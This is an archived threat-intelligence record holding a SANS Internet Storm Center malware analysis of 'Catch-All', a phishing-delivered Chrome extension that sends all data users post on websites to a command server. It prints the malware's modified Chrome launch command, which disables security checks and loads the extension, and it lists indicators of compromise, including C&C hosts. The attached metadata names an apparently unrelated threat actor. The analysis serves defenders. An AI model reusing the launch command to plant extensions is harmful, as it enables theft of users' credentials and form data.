{
	"id": "8ec51f31-6038-417d-b5f5-b54b921a3180",
	"created_at": "2026-04-06T00:12:15.914523Z",
	"updated_at": "2026-04-10T03:21:44.96927Z",
	"deleted_at": null,
	"sha1_hash": "90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d",
	"title": "\"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2274890,
	"plain_text": "\"Catch-All\" Google Chrome Malicious Extension Steals All Posted\r\nData\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 20:49:47 UTC\r\n1. Introduction\r\n            It seems that malicious Google Chrome extensions are on the rise. A couple of months ago, I posted here\r\nabout two of them [1][2] which stole user credentials posted on banking websites and alike. Now, while analyzing\r\na phishing e-mail, I went through a new malware with a slight different approach: instead of monitoring specific\r\nURLs and focusing on credentials, it captures literally all data posted by the victim on any website – thus the\r\nname.\r\n            In today’s diary, I’ll detail the aspects of “Catch-All” malware that caught my attention. Let’s start with the\r\nthreat analysis diagram in Figure 1 followed by the text description in section 2.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 1 of 9\n\nFigure 1: “Catch-all” threat flow\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 2 of 9\n\n2. Threat analysis\r\n        This campaign infection vector is a phishing e-mail with links to photos supposedly from the weekend\r\npretending to be sent through Whatsapp. The subject is in Portuguese: “Segue as (Fotos Final de Semana )\r\nEnviadas via WhatsApp (30244)”. Something like “See the (Weekend Photos) Sent via WhatsApp (30244)”;\r\n       Following any “photo” link, the victim will download the malware dropper file called “whatsapp.exe”. Once\r\nexecuted, “whatsapp.exe” will present a fake Adobe PDF Reader install screen, as seen in Figure 2, while\r\ndownloads, unzips (output are two files, md0 and md1) and executes a “.cab” file called “md18102136.cab”, as\r\nseen in Figure 3.\r\nFigure 2: Fake Adobe PDF Reader install screen\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 3 of 9\n\nFigure 3: Dropper downloading malware payload\r\n        The “md18102136.cab” file is a ~9.5 Mb zip compressed that, after uncompressed, will result in two very\r\nlarge files of ~200Mb each as shown in Figure 4.\r\nFigure 4: md18102136.cab content\r\n         Looking at the content of those binaries, it was possible to see that just ~3% of them had actual instructions,\r\nas seen in Figure 5. The rest are “NOP” code to bloat the file – possibly as a strategy to bypass anti-malware\r\nsolutions that usually do not inspect large files.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 4 of 9\n\nFigure 5: Bloated binaries\r\n         Once executed, “md0” will attempt to disable Windows Firewall and kill all Google Chrome processes in\r\norder to install the malicious extension, as seen in Figure 6.\r\nFigure 6: Disabling the Firewall and Killing Google Chrome processes\r\n       It then extracts from itself a Google Chrome extension and changes Google Chrome launcher (“.lnk”) files to\r\nload it on the next execution, as seen in Figures 7.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 5 of 9\n\nFigure 7: Loading malicious extension\r\nThis is the content inserted by the malware on “Target” field of Google Chrome link file:\r\n\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\"  --disable-extensions-file-access-check --\r\nalways-authorize-plugins --disable-improved-download-protection --load-extension=\"C:\\Users\\\r\n\u003cUSER\u003e\\AppData\\Local\\complemento\\E1EDEAE8EFE3E0EEE0DC2610495\r\nNote that, additionally to load the extension, it disables important security features that could avoid malicious\r\nextension to work properly.\r\n--disable-extensions-file-access-check: disable checking for user opt-in for extensions that want to inject script\r\ninto file URLs (ie, always allow it). This is used during automated testing.\r\n--always-authorize-plugins: prevents Chrome from requiring authorization to run certain widely installed but less\r\ncommonly used plug-ins.\r\n--disable-improved-download-protection: disables improved SafeBrowsing download protection (do not verify\r\nfiles with built-in protection)\r\n3. The malicious extension\r\n            After deobfuscating the malicious extension JavaScript source code, it was possible to analyze how it\r\ncaptures and leaks all data posted by the victim on any website. Looking at Figure 7, it is possible to see that it is\r\nencoding both URL and query string of “requestBody” and giving it to a function called “savetofile”.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 6 of 9\n\nFigure 8: Capturing “requestBody” content\r\n       The function “savetofile”, as seen in Figure 9, will send the captured data to a C\u0026C server using jQuery ajax\r\nconnections.\r\nFigure 9: Leaking “requestBody” content\r\nDebugging the extension while trying to log into Gmail, it was possible to see the content that would be sent to\r\nC\u0026C server, as shown in Figure 10.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 7 of 9\n\nFigure 10: Data leaking\r\n4. Final words\r\nSo, using such approach, an adversary would be able to capture high sensitive data with not much effort compared\r\nto standard methods. It wasn’t necessary for the attacker to attract the victim to a fake website with doubtful SSL\r\ncertificates or deploying local proxies to intercept web connections. Quite the opposite, the user is accessing\r\noriginal and legitimate websites and all the interactions are working properly while data is captured and leaked. In\r\nother words, this method may subvert many security layers the victim may have in place.\r\nAs I mentioned in previous related posts[1][2], it sounds strange to me Google Chrome allowing extensions access\r\nsensitive form fields, like passwords, without asking for an additional user’s approval, as well as allowing an\r\nextension to silently and autonomously stablish a connection to an external entity. Additionally, browser security\r\nfeatures that could protect user from harmful extensions can be disabled through command line arguments as in\r\nthis case. Should non-tech savvy users be able to programmatically deploy rogue extensions? Comparing it to\r\nAndroid or iOS ecosystems, it is like allowing users to easily deploy apps not offered by official stores or another\r\nsafe channel. What do you think?\r\n5. Indicators of Compromise (IOCs)\r\nFiles\r\nMD5 (md0) = 72c35311136adaaf2c31d54b7d2c462e\r\nMD5 (md1) = bbca1ced8eea1a63e4e05a7f7e368b69\r\nMD5 (whatsapp.exe) = 713fed252238d2cbd48a18b3faa67a8e\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 8 of 9\n\nExtension Files\r\nMD5 (btwjvx.js) = 229495556791239ecf88e883124284b7\r\nMD5 (ico.png) = 42ab831ae1520621f4117d3639b1131d\r\nMD5 (java_128.ico) = a5c5f16f314bb022edcdb084850f0d63\r\nMD5 (java_32.ico) = d7a6c3c105a0ab5dc39bdf5005f044b4\r\nMD5 (java_64.ico) = 748e901736d11413f8856f9db82e7328\r\nMD5 (manifest.json) = 214859fb1903fefb8c0142273953b4dc\r\nMD5 (unjjmwv.js) = 5ca7582261c421482436dfdf3af9bffe\r\nNetwork\r\nhxxps://storage.googleapis.com/webfotosb/Whatsapp.html\r\nhxxp://177.11.55.90/md18102136.cab\r\nhxxps://agenziapetra.com:1515/\r\nReferences\r\n[1] https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/\r\n[2]\r\nhttps://isc.sans.edu/forums/diary/Second+Google+Chrome+Extension+Banker+Malware+in+Two+Weeks/22766/\r\n--\r\nRenato Marinho\r\nMorphus Labs| LinkedIn|Twitter\r\nSource: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.c\r\nom/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)"
	],
	"report_names": [
		")"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434335,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.pdf",
		"text": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.txt",
		"img": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.jpg"
	}
}